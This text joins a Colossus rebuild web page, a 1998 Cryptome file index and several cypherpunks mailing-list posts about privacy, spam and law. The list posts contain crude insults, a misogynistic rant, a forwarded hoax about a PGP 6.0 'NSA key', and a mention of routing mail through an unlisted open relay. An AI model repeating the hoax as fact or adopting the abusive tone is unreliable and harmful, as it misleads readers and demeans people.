with very long period and 10^19 complexity. They thought this was good
enough to ensure unbreakability, it wasn't!


A bibliography of works discussing the Lorenz
cipher has been compiled by
Frode Weierud is availabe here by
permission.  As is a book chapter describing the
Swedish effort to crack Lorenz.


The German high command thought that the Lorenz machine was
completely unbreakable and used it for their most secret messages,
literally from Hitler to his generals and between generals. The
interception and deciphering of these messages gave Generals Eisenhower
and Montgomery vital information prior to and after D Day in 1944.


Colossus was the world's first large electronic valve programmable
logic calculator, not just one but ten of them were built and
operational in Bletchley Park the home of Allied WW II codebreaking.

The question of what is the worlds first computer is less a question
of history than a question of definition.
The Mark 1 at
Manchester (1948) is a strong contender.


A view of Colossus



Colossus found the wheel settings used by the German Lorenz machine
operator for a particular message. When these had been found, which took
about two hours, they were plugged up on the Tunny machine. It was this
machine which actually deciphered the message.



This is the Tunny room in Bletchley Park in 1945.

Colossus, hardware details


Input:
    cipher text
	punched onto 5 hole paper tape read at 5,000 characters per second by
	optical reader
Output:
    Buffered onto relays: Typewriter printing onto paper roll
Processor:
    Memory 5 characters of 5 bits held in a shift register.
	Clock speed 5kc/s derived from input tape sprocket
	holes. Internally generated bit streams totalling  501 bits in rings of
	lengths equal to the number of mechanical lugs on each of the 12 Lorenz
	wheels. A large number of pluggable logic gates. 20 decade counters
	arranged as 5 by 4 decades. 2,500 valves.
Power supplies
    +200v to -150v at up to 10A.
Power consumption
    4.5KWatt
Size:
    Two banks of racks 7ft 6inches high by 16ft wide spaced 6 ft apart.
	Bedstead, 7ft 6inches high 4ft wide by 10ft long


Colossus, operating cycles

The basic machine cycle: read
a character from tape,  get bits from bit stream generators, perform up
to 100 logic operations, clock result into decade counters.


The cycle determined by the input tape: The intercepted
enciphered text tape is joined into a continuous loop with
about 150 blank characters in the join. Specially punched
start and stop holes indicate the beginning and end of the
cipher text.


On receipt of start hole pulse: Start bit
stream generators and send sampling pulses to reader output. Execute
basic machine cycle until receipt of stop hole pulse: Staticise counter
states onto relays. After a delay, reset counters and reset bit stream
generators to a new start position.

Colossus programming

All programmes hard wired, some permanently, some pluggable.
Conditional jumping possible between
alternative programmes depending on counter outputs.

The Rebuild

Work on the rebuild started two years
ago with the collection of all available information about Colossus,
including a series of official photographs taken in 1945.


The first
stage was to produce accurate machine drawings of the frames for
Colossus (all the original machine drawings had been burnt in 1960).
This involved three months of eyestrain pouring over the photographs and
using 3D projections to transfer the details to a CAD system, EasyCad
running on a 486 PC. 




Next problem was the optical paper tape reader system. The details
of this are not shown in any of the photographs. However I managed to
locate Dr Arnold Lynch who designed the reader system in 1942. Although
well into his 80's Dr Lynch came to my house and using my CAD system we
re-engineered the reader system to his original specifications. Then I
built it and here it is.




It uses original Colossus hard vacuum photocells, shown here on the
left and a mask onto which the image of the tape is projected by a
Colossus lense.



All the racks are now in place.

Here are some of the decade counters.

We are also rebuilding the Tunny machine.


The current state of Colossus: Jan 96

Examples of most
of the circuit panels are now working and the whole machine is working
at one bit level.


We are now rapidly cloning circuit panels to
populate all the racks.

I need lots more valves: EF36, 37 or 37A
pentodes, 6J5 triodes, 6V6 tetrodes and GT1C gas filled triode
thyratrons. The 6J5's and 6V6's should be the large glass versions to
look right.


Please send any contributions, valves or money,  to me (Tony Sale)
at   "The Colossus Rebuild Project, 15 Northampton Road, Bromham, Beds 
MK43 8QB"    tel: 01234 822788  email:
TSale@qufaro.demon.co.uk


Come and see the Colossus Rebuild, the Lorenz machine and codebreaking
exhibitions in Bletchley Park.



This page was created by Tony Sale
(tsale@qufaro.demon.co.uk)
of the Bletchley Park Trust, and
has been modified by Jeff Goldberg
(J.Goldberg@Cranfield.ac.uk)
of the Cranfield University Computer
Centre.



Title: Cryptome







  
    
      
	  
	  Cryptome
	
	
	
	
	JYA/Urban
	Deadline
	
	OpEd
    
  


_______________________________________________________________________________________

File               Topic                                             Date

_______________________________________________________________________________________



sib.htm            Scientists in Black                               February 3, 1998
CAP                The Cryptographic Analysis Program (offsite)      February 2, 1998
Arne Beurling      The Geheimschreiber Secret (offsite)              February 2, 1998
Army Stegano       US Army Steganography (offsite)                   February 2, 1998

<A HREF="http://www.cranfield.ac.uk/ccc/bpark/colossus.htm
">Colossus           Rebuilding Colossus (offsite)                     February 2, 1998
Frode Crypto       Cryptology Papers (offsite)                       February 2, 1998
jimbell9.htm       Jim Bell Update                                   February 2, 1998
echelon-boost      NSA Surveillance System Boosted (offsite)         February 2, 1998
cn020298.txt       Crypto News                                       February 2, 1998

bxa020298.txt      BXA Meet on Export Rules and Procedures           February 2, 1998
cs020298.txt       Rules to Challenge Customs Seizures (63K)         February 2, 1998
usg020298.txt      USG Secret Meets                                  February 2, 1998
echelon.htm        NSA Global Surveillance System                    February 2, 1998
cathedral.htm      The Cathedral and the Bazaar                      February 1, 1998

natsec-rule.htm    Protection of National Security Information       February 1, 1998
47cfr216.txt       National Communications Issuance System (106K)    February 1, 1998
47cfr213.txt       Emergency Telecomms Precedence System (17K)       February 1, 1998
47cfr202.txt       National Security Emergency Plans & Ops (27K)     February 1, 1998
47cfr201.txt       Policy for Telecomms During Emergencies (12K)     February 1, 1998

44cfr336.txt       Facilities for National Security Emergency (14K)  February 1, 1998
44cfr334.txt       FEMA Graduated Mobilization Response (14K)        February 1, 1998
32cfr322.txt       Privacy Act Exemption for NSA Records (40K)       February 1, 1998
32cfr299.txt       National Security Agency FOIA Program (8K)        February 1, 1998
32cfr2101.txt      National Security Council FOIA Requests (24K)     February 1, 1998

32cfr185.txt       Military Support to Civil Authorities (52K)       February 1, 1998
31cfr9.txt         Effects of Imported Articles on National Security February 1, 1998
22cfr124.txt       Contracts, Off-Shore Buys, Defense Services (42K) February 1, 1998
22cfr123.txt       Licenses for the Export of Defense Articles (51K) February 1, 1998
22cfr121.txt       United States Munitions List (92K)                February 1, 1998
_______________________________________________________________________________________


ntia-dnsdrft.htm   Draft Proposal for New Domain Name System         January 30, 1998
korczak.txt        Boris Korczak: CIA Agent Seeks Payment            January 30, 1998
pm87.txt           Prez on Terrorist Threat to Middle East Peace     January 30, 1998

leahy-wipo.txt     Senator Leahy on Ratifying WIPO Treaties          January 30, 1998
32cfr147.txt       DoD: Policies for Access to Classified Info       January 30, 1998
32cfr148.txt       DoD: Facilities for Storing Classified Info       January 30, 1998
32cfr149.txt       DoD: National Policy on Technical Surveillance    January 30, 1998
ntia012798.htm     RFC: Self-Regulation for Privacy Protection       January 30, 1998

cylinked.htm       Latest: Cylinked to Organized Crime?              January 29, 1998
websoft-warn.htm   Web Software Warning                              January 29, 1998
scant-peril.htm    U.S. Spy Agencies Pauline Peril                   January 29, 1998
mossburg.htm       E-Comm Forum on E-Authentication and DigSig       January 29, 1998
pollard.htm        Bankers O Table on E-Authentication and DigSig    January 29, 1998

brown.htm          Secret Service on Financial Instruments Fraud     Janaury 29, 1998
rpk-hack.htm       Invite to Hack RPK InvisiMail                     January 29, 1998
nrc012998.txt      Generic Letter on Y2K Readiness for Nuke Plants   January 29, 1998
fc012998.txt       FinCEN RFC on Information Collection              January 29, 1998
dtc012998.txt      Arms Export to Saudi Arabia                       January 29, 1998

nsa-etc-nf.htm     NSA, Echelon, Trade & Crypto/Netscape & Fortify   January 28, 1998
dod012898.txt      DoD Blacklist of Higher Education                 January 28, 1998
47usc1002.txt      Interception of Digital and Other Communications  January 28, 1998
cn012898.txt       Crypto News                                       January 28, 1998
cn012798.txt       Crypto News                                       January 27, 1998

bxa-fy98.txt       BXA Funding FY 1998                               January 27, 1998
cia-tsang.htm      CIA Concedes Spying on Americans                  January 26, 1998
atpc.htm           EU-Parliament: Technologies of Political Control  January 26, 1998
us-crypto.htm      US Crypto Policy                                  January 25, 1998
pg-nzcrypto.htm    New Zealand Crypto Policy                         January 24, 1998

ra-ukcrypto.htm    UK Crypto Policy                                  January 24, 1998
whp012398.htm      Payne/Morales vs. NSA: Reply to Defendant         January 23, 1998
kellner.htm        Intellectuals and New Technologies (66K)          January 23, 1998
bxa012398.txt      BXA Penalizes Export Violator                     January 23, 1998
osd012398.txt      Compensation of North Viet-Imprisoned Operatives  January 23, 1998

dod012398.txt      Defense Dept Secret Meets                         January 23, 1998
walton-pk.htm      GCHQ: The Pre-History of Public Key Cryptography  January 22, 1998
primer             The Proliferation Primer (offsite)                January 22, 1998
sh105-238.txt      Proliferation and US Export Controls (196K)       January 22, 1998
sh105-267.txt      Safety and Reliability of US Nukes (347K)         January 22, 1998

acda012298.txt     Arms Control Secret Meet                          January 22, 1998
pd012298.txt       Prez Notice on Mideast Terrorism Emergency        January 22, 1998
bia012298.txt      Rule on Indian Casinos                            January 22, 1998
cn012198.txt       Crypto News                                       January 21, 1998
fc98.htm           Financial Cryptography '98                        January 20, 1998

doj-ssgsup.htm     Supplement to Fed Guide for Seizing Computers     January 20, 1998
cn-netreg.htm      New Chinese Internet Regulations                  January 20, 1998
pg-get-MSkey.htm   How to Recover Private Keys for Microsoft Wares   January 20, 1998
ietf-dea-97.htm    IETF Draft Encryption Algorithms 1997             January 20, 1998
radio-rec.htm      Update: Locating Radio Receivers; Encoder Stolen  January 20, 1998

pipenet.htm        PipeNet Description                               January 20, 1998
dod012098.txt      Defense Dept Secret Meets                         January 20, 1998
bernstein12.htm    Transcript of Bernstein Hearing                   January 19, 1998
fbi-umbc.htm       Barry Smith (FBI) to Speak on Encryption Policy   January 18, 1998
de-snoop.htm       Update: German Surveillance State                 January 17, 1998
bxa-wa-rule.htm    Update 2: BXA Rule on the Wassenaar Arrangement   January 16, 1998

pd98-10.htm        Prez OKs China's Nuclear Controls                 January 16, 1998
tcryptol           Theory of Cryptography Library (offsite)          January 16, 1998
cn011698.htm       Crypto News                                       January 16, 1998
nsasuit8.htm       USA/NSA Responds to Payne/Morales Motion          Janaury 16, 1998
dod011698.txt      Defense Dept Secret Meets                         January 16, 1998

bxa011398.txt      Materials Advisory Meet                           January 15, 1998
crypto-kong.htm    Announcing Crypto Kong                            January 15, 1998
occ-dstc.htm       OCC OKs CA as Authorized Banking Activity         January 14, 1998
aes-980820         Advanced Encryption Standard Conference (offsite) January 14, 1998
ustr010898.txt     Update: Telecommunications Trade Agreements       January 14, 1998

rc2.htm            Rivest Describes RC2 Encryption Algorithm         January 13, 1998
fc011398.txt       FinCEN Regulates Card Clubs                       January 13, 1998
ta011298.txt       Key Management Infrastructure Meet                January 12, 1998
nist011298.txt     Transmission-Electron Microscopy Meet             January 12, 1998
doa011298.txt      Army Hazard Containment Invention                 January 12, 1998

gps-jam.htm        GPS Jamming                                       January 11, 1998
arthur.htm         The Force of An Idea: Theory of USA v. Microsoft  January 10, 1998
RSA-stego.htm      Batch RSA for Stego Data                          January 9, 1998
batch-DSA.htm      Batch DSA                                         January 9, 1998
cell-track.htm     Update 2: Mobile Cell Phone Surveillance          January 9, 1998

fiat-rsa.htm       Fiat's Batch RSA                                  January 9, 1998
aes010798.htm      Update: Advanced Encryption Standard              January 9, 1998
doj010998.txt      RFC: USA v. IBM/STK Antitrust Suit                January 9, 1998
bmd010898.txt      Ballistic Missile Defense Secret Meet             January 9, 1998
nih010898.txt      Commercialization of Medical Data                 January 9, 1998

fas-pde            Prez Directives/Executive Orders (offsite)        January 7, 1998
ussc-ecopy.htm     Sentencing for Electronic Copyright Violations    January 6, 1998
ussc010698.txt     RFC: US Sentencing Guidelines (254K)              January 6, 1997
mercier.htm        Terrorists, WMD, and the US Army Reserve          January 6, 1998
terror-rnd.htm     US Counterterrorism R&D Program                   January 6, 1998

belet              Bob East Letter on AP/Jim Bell/IRS (offsite)      January 6, 1998
pitfalls           Schneier: Security Pitfalls in Crypto (offsite)   January 5, 1998
dsb010598.txt      Defense Science Board Secret Meets                January 5, 1998
ntia010598.txt     Funds for Public Telecommunications               January 5, 1998
cn010598.txt       Electronic Surveillance News                      January 5, 1998

csda.htm           Cypherpunks Smartcard Developer Association       January 4, 1998
aimd-98-21.htm     Executive Guide: Info Security Management (139K)  January 3, 1998
blast-mono.htm     Blast Resistant Doors Monograph                   January 3, 1998
tempest-door.htm   Electromagnetic Shielding/TEMPEST Door            January 3, 1998
ehj.htm            Banned Basque Video: Democratic Alternative       January 3, 1998


fda010298.htm      Policy for External Penile Rigidity Devices       January 2, 1998
doe010298.htm      Defense Nuclear Facilities Safety Plan            January 2, 1998
dos010298.txt      Meet on Global Communications and Info Policy     January 2, 1998
doa010298.txt      Army Science Board Meet                           January 2, 1998

_______________________________________________________________________________________







  
    
      
	
	    Cryptomb 2
	  
	  
	  June-December 1997
	  
	    
	  
	   Cryptomb
	  1
	  
	  To May 31 1997
      
    
  
  
  
  
    
    
  
  
  
  
  
  
  (site
  stats)
  
  
    
      
	
	    DoE: Pay Bill
	  Payne  
      
      
	
	  DoJ: Free Jim Bell
      
    
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Tue, 3 Feb 1998 14:36:29 +0800
To: cypherpunks@Algebra.COM
Subject: Exon oxen gored
Message-ID: <199802030625.HAA07572@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Exon and his ilk have loose bowels and bladder control problems. 
They shit all over the populace and urinate all over the Constitution.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Tue, 3 Feb 1998 16:19:02 +0800
To: cypherpunks@cyberpass.net
Subject: Inquiry
Message-ID: <199802030745.IAA15801@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri "Buttfuck" Vulis' reheated, refurbished, and regurgitated 
cud is completely inappropriate for the mailing lists into which 
it is cross-ruminated.

      ,,,
 -ooO(o o)Ooo- Dimitri "Buttfuck" Vulis
      (_)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Feb 1998 22:15:58 +0800
To: cypherpunks@toad.com
Subject: Scientists in Black
Message-ID: <1.5.4.32.19980203140145.00756490@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



In "Scientists in Black,"Jeffrey Richelson, noted intel author, 
surveys use of vast archives of classified intelligence data by 
select civilian scientists under the Medea program (SciAm,
Feburary 1998).

   http://jya.com/sib.htm  (40K with 4 images)

Thanks to PJP for pointing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 4 Feb 1998 01:23:59 +0800
To: "Michael H. Warfield" <mhw@wittsend.com>
Subject: UrsinePunks  (Re: County Mounties Spit on the 4th Amendment)
In-Reply-To: <695e7d4cd89037ab6c4e383c56f8fa6b@privacynb.ml.org>
Message-ID: <v03102800b0fcfe020bd6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:25 AM -0800 2/3/98, Michael H. Warfield wrote:

>"Supertroupers" refers to State Patrol.  The term "Smokie" (coined from
>the movie Smokie and the Bandit) refers to all police.

Nope, not coined from the movie.

Just the reverse.

Highway cops were called "smokies" (or "smokeys") when I was growing up in
Virginia in the 60s, long before the movie.

I haven't checked the derivation, but had always assumed it came from the
Smokey the Bear figure, who wore a tall, broad-brimmed hat (also known as a
campaign hat). The hat worn by many state highway patrols. Ergo, "smokeys."

(I used to see the _real_ Smokey the Bear at the Washington Zoo. I think he
died of old age in the 1970s.)

(A URL with a few details is
http://www.4j.lane.edu/websites/roosevelt/Connections/smokey.html)


--Tim May, posting from the Bear State

"National borders aren't even speed bumps on the information superhighway."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Tue, 3 Feb 1998 22:32:17 +0800
To: nobody@privacynb.ml.org
Subject: Re: County Mounties Spit on the 4th Amendment
In-Reply-To: <695e7d4cd89037ab6c4e383c56f8fa6b@privacynb.ml.org>
Message-ID: <199802031425.JAA23565@alcove.wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous Sender enscribed thusly:
> >Oh! The 4th amendment? That dusty old thing? When the scumbags 
> >are kicking in your door which would you rather have protecting >you: a raggedy old piece of paper or a Prince George County >Mountie SWAT team in full ninja dress and the latest high-tech >law-enforcement goodies? Thought so. Cup's at the end of the >counter comrade. Have a nice day. 

> You couldn't be talking about Prince George, Canada, could you?
> "Mounties" are Royal Canadian Mounted Police (RCMP), and are 
> limited to Canada, and Disney World.

	"County Mounties" is a CB (Citizens Band Radio for those not
familiar with US radio) slang term in the US for local police.  Conversely
"Supertroupers" refers to State Patrol.  The term "Smokie" (coined from
the movie Smokie and the Bandit) refers to all police.

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@avwashington.com>
Date: Tue, 3 Feb 1998 22:32:07 +0800
To: cypherpunks@toad.com
Subject: Spammers
In-Reply-To: <34c704c2.971366@128.2.84.191>
Message-ID: <v03102807b0fcd856e294@[207.79.65.77]>
MIME-Version: 1.0
Content-Type: text/plain



Good day list.

I was just in the process of mailing off a copy of the GNU
junk email contract to some sammer or another, and it occured to
me;

It would certainly be nice to collect that 10buks a hit for this
crap,

It will never happen,

Seems alot the spam I recieve originates with a node from uu.net and I am
no big
fan of Ubermesiter John Sidgmore,

Wouldn't it be nice to hold uu.net culpable for all their spamming ways. They
want to own the internet, let them hang for it.

Just a thought, anyone intested in doing a class action to recover
email processing fees?

luv
chipper






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 4 Feb 1998 14:23:50 +0800
To: Simon Fraser <cypherpunks@toad.com
Subject: Re: Spammers
In-Reply-To: <v03102807b0fcd856e294@[207.79.65.77]>
Message-ID: <3.0.5.32.19980203093050.0084dce0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Wouldn't it be nice to hold uu.net culpable for all their spamming ways.
>> They want to own the internet, let them hang for it.
>
>http://www.us.uu.net/support/usepolicy/
>It would be nice to differentiate between the spammers themselves and the
>ISP they use. 

You'd lose a class action suit.  More important is to get them to close
any open sendmail relays at their dialup sites (maybe they have by now),
since those formerly-useful servers are a major tool for spammers.
The other problem is just that they're big enough that if even a small
fraction of their customers are spammers, lots of spam comes from their
customers; at least they don't encourage it, unlike some providers.

If you want to cut way down on spam, there's Paul Vixie's
Realtime BlackHole List service at maps.vix.com.  It uses DNS as a 
convenient query/response server and some short sendmail scripts
to block mail from any site known to have an open smtp relay.
They're fairly zealous, and don't mind throwing away a few extra 
babies to get rid of lots of bathwater, so if you don't want to block
everybody that they block you'll need to hack some sendmail configs.
My main frustration is that they block mail from the ix.netcom.com
smtp servers, which blocked mail from me to the PGP-users list,
but I've found another relay at Netcom that they don't know about :-)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 4 Feb 1998 14:18:17 +0800
To: "Michael H. Warfield" <mhw@wittsend.com>
Subject: Re: County Mounties Spit on the 4th Amendment
In-Reply-To: <695e7d4cd89037ab6c4e383c56f8fa6b@privacynb.ml.org>
Message-ID: <3.0.5.32.19980203094020.0084dce0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:25 AM 2/3/98 -0500, Michael H. Warfield wrote:
>	"County Mounties" is a CB (Citizens Band Radio for those not
>familiar with US radio) slang term in the US for local police.  Conversely
>"Supertroupers" refers to State Patrol.  The term "Smokie" (coined from
>the movie Smokie and the Bandit) refers to all police.

Argh - get your history right, kid!   The movie Smokey and the Bandit
used the already-current slang for cops, which was based on the
Smokey The Bear hats that many police uniforms use.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill@rumplestiltskin.com
Date: Wed, 4 Feb 1998 01:50:23 +0800
To: cypherpunks@ssz.com
Subject: A fatal flaw in PGP 6.0
Message-ID: <235883DCF38CD011963A0060972DBB4D20720A@mail.executive.com>
MIME-Version: 1.0
Content-Type: text/plain



This was posted anonymously to alt.security.pgp last night

>Subject: PGP 6.0 alpha3
>Date: 3 Feb 1998 00:15:56 +0100
>
>Anyone else having problems with the alpha of PGP 6.0?  When I try to
encrypt e-mail I get an error:
>
>FATAL ERROR
>
>Unable to find key "ghost@nsa.gov"
>Please obtain a new key from Network associates.
>
>
>Other than that it's pretty slick!  I'm not sure I'd have the default
cypher as ROT-13 though!  I changed mine to RC-2 255-bit.
>
>Anyone else?

Anyone like to confirm this?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James O'Toole" <otoole@lcs.mit.edu>
Date: Wed, 4 Feb 1998 01:20:06 +0800
To: "'Tim May'" <tcmay@got.net>
Subject: RE: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
Message-ID: <01BD308B.1A566960@slip-james.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




Tim, the "social pressure" I was referring to is the process through which the obstacles to privacy-protecting measures are created and enforced.  Examples include both government regulation, which derives part of its support from publicity connecting cash with money laundering with drugs and/or crime, as well as finality/liability rules within non-government financial consortiums, which may strongly encourage proof-of-identity.

Let's take your example of the Institute of Applied Ontology (IAO) corporate Amex card (Ax)... 

Even with no relevant government regulations, we may find that Ax's agreement with merchants requires Ax to at least either pay the merchant or reveal to the merchant all relevant information known to Ax about the cardholder.  The right contract terms between the merchant and Amex will be good for them, and may be good for most consumers, and could easily be sub-optimal for the subset of consumers who highly value privacy.  The impracticality of negotiating special terms with each merchant means that the best plan to get the privacy/anonymity you want may be to set up a card such that Amex will be willing to operate without knowing much about the cardholder.  I assume that's the intent of your IAO corporate Ax card.

What allocation of the liability for card usage do you expect among Amex, IAO, and the cardholder?  Amex will want the liability allocated to IAO and the cardholder, and if Amex does not possess traceable identity information on the cardholder, then Amex will want an enforceable promise to pay from IAO.  To get this, or even to get funds in advance from IAO, we will find that Amex ends up knowing a lot about the identity of IAO or one of its officers.  Pretty soon we'll run up against the problem of whether Tim May can configure a corporate in the U.S. to be operated by people who don't know who he is, and who can't find out who he is (when properly encouraged to cooperate by Ken Starr...).  With or without government regulation, the most reliable people you can hire to operate that corporation for you may only want to do so if they are given the opportunity to somehow "know" you.

I think you can probably use a bank in a privacy-enhancing-locale such as Switzerland as an effective intermediary in Amex card issuance, but if you really don't want the bank to know who you are, you'll probably need a corporate intermediary between you and the bank, with nominee officers.

The real trick is probably to structure the whole thing so that neither the bank nor the nominee officers have anything to lose, including their reputations.  As long as part of their reputation is that they don't act as front men for drug dealers and criminals, we may find that they keep trying to find out enough about who you are to satisfy themselves that you are a good guy.  That's the social pressure flexing its muscles.

>An interesting question about the Privacy Card product is whether the
>social pressure against it is strong enough to defeat its privacy whenever
>the product is well advertised.  In other words, will a privacy product
>survive in spite of its own publicity in our current environment, or can

Corporate cards are already widely accepted...most of you probably have a
card issued to you through your employing institution. I see no "social
pressure" to block usage of my Institute of Applied Ontology corporate AmEx
card.

The real roadblock is that government makes such privacy-protecting
measures either difficult or illegal.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 4 Feb 1998 01:38:08 +0800
To: cypherpunks@cyberpass.net
Subject: The War on Some Debts
Message-ID: <199802031640.KAA18766@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



In a further blatant erosion of Constitutional rights, the California
Supreme Court has ruled that a person owing child support who fails to
seek or accept work may be jailed and fined for contempt of court, and
that this does not violate any Constitutional bans on involuntary
servitude or imprisonment for debt. 
 
This reverses nearly a century of contrary rulings.  Look for this
"improved" interpretation to be expanded to other kinds of debts and
judgments as well, as soon as massive public acceptance of it for the
carefully picked child support issue is engineered. 
 
The credit card companies are no doubt carefully analyzing this decision
as we speak. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 4 Feb 1998 03:08:59 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: The War on Some Debts
In-Reply-To: <199802031640.KAA18766@wire.insync.net>
Message-ID: <v03102801b0fd117e9fc9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:40 AM -0800 2/3/98, Eric Cordian wrote:
>In a further blatant erosion of Constitutional rights, the California
>Supreme Court has ruled that a person owing child support who fails to
>seek or accept work may be jailed and fined for contempt of court, and
>that this does not violate any Constitutional bans on involuntary
>servitude or imprisonment for debt.

Oh, things like this have been common in California, and elsewhere, for a
long time. It's a big part of the reason many guys I know don't fall into
the marriage trap.

Not only does the court demand that fathers (and, in 0.001% of cases,
mothers) go back to work, they also calculate what the "expected
compensation level" is of a person and assess them alimony and child
support based on _that_ number.

As one example, a friend of mine at Intel was working at home to set up his
own business. His wife left him (cleaning out the checking account and
having movers cart the furniture away while he was on a trip) and then sued
for outlandish alimony and child support benefits.

The court based the amount he owed on what he _had been_ earning as an
engineer at  the company, and what the court figured would have been his
current earnings there, not on what he was actually earning doing his
startup company.  His "earning potential." (Wait til the IRS and Congress
figure they can start taxing folks based on their peak earnings
potential...)

He had to fold his business startup and go back to work. And not just at a
job he liked...he had to find one that paid enough to pay off the bitch,
based on his peak earning potential. This is also known as "supporting her
in the lifestyle to which she had become accustomed"...never mind that when
they were married my friend made damned sure she didn't spend money the way
she wanted to...in her case, she presumably saw the divorce as a way to get
half of all the saved assets, plus an extremely lucrative alimony/child
support deal.

(Meanwhile, the bitch took her property settlement, blew it on an expensive
new car, lots of new furniture, expensive vacations, and, of course, didn't
do a lick of work...until the money ran out. And now that the alimony has
run out, she's now reduced to working as a technician for a disk drive
company. My friend worked his butt off, saved his money, invested wisely,
and is now once again "retired." He doesn't plan to make the same mistake
again. He's mostly hoping she doesn't hire some new lawyers and try to get
another piece of his newly-accumulated assets!)


>This reverses nearly a century of contrary rulings.  Look for this
>"improved" interpretation to be expanded to other kinds of debts and
>judgments as well, as soon as massive public acceptance of it for the
>carefully picked child support issue is engineered.

And, by the way, this whole mess about child support, alimony, and such is
a big reasons for citizen-unit tracking programs. Many levels of
government, from local social services to national agencies, want to know
where the father-units are so that money can be siphoned off to the
mother-units and child-units. All of the talk about "privacy laws" is
mooted by the desire by Big Brother to track and trace "deadbeat dads" and
others who BB thinks need tracking (everyone).

I'm generally in favor of fathers paying for their children, but not the
way things are done now. Where the father may have no visitation or custody
rights, where the mother is often free to just kick back and watch soap
operas on t.v. while the father works his butt off to pay for both
households, where "community property" is divided without regard for who
put the money in in the first place, and so on.

If women want to look at why fewer and fewer men are "prepared to make a
commitment," their favored psychobabble term, they need only look at how
the courts have declared marriage + divorce to be a golddigger's dream.

Marry a guy, divorce him a few years later, which he can't even contest,
and have half of all of his accumulated assets, plus a lucrative benefits
package. Such a deal.

And even being a queer doesn't save someone...I hear that in California the
gays and lesbians are pushing for community property "rights" to be
established.

The whole system needs to be nuked.

--Tim May



"National borders aren't even speed bumps on the information superhighway."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 4 Feb 1998 01:39:33 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <199802030242.DAA10101@basement.replay.com>
Message-ID: <v04003a0eb0fce6005c81@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:31 pm -0500 on 2/2/98, Tim May wrote:


> At 6:42 PM -0800 2/2/98, Anonymous wrote:
> >Tim May wrote:
> >> The real solution is easy.
> >
> >
> >Easier said than done.

<snip>

> When I say the real solution is easy, I mean it. Get rid of the laws

Nope. Making or repealing laws won't mean too much for the privacy of
transactions, except to reallocate who gets screwed in some kind of
political zero-sum game.

Anyway, laws are there because there's an economic incentive for them to be
there. Reality is not optional. Physics creates economics which creates
laws. Not the other way around. Even morality and ethics come from culture,
which itself is a physical phenomenon, the collective response of humans to
the resources on hand,  which is an economic process if there ever was one.

So, only when digital bearer certificate technology like blind signatures
is proven to be *cheaper* than the current privacy-invasive book entry
transaction regime will there be any demand for digital bearer settlement
of assets, debt, and cash transactions.

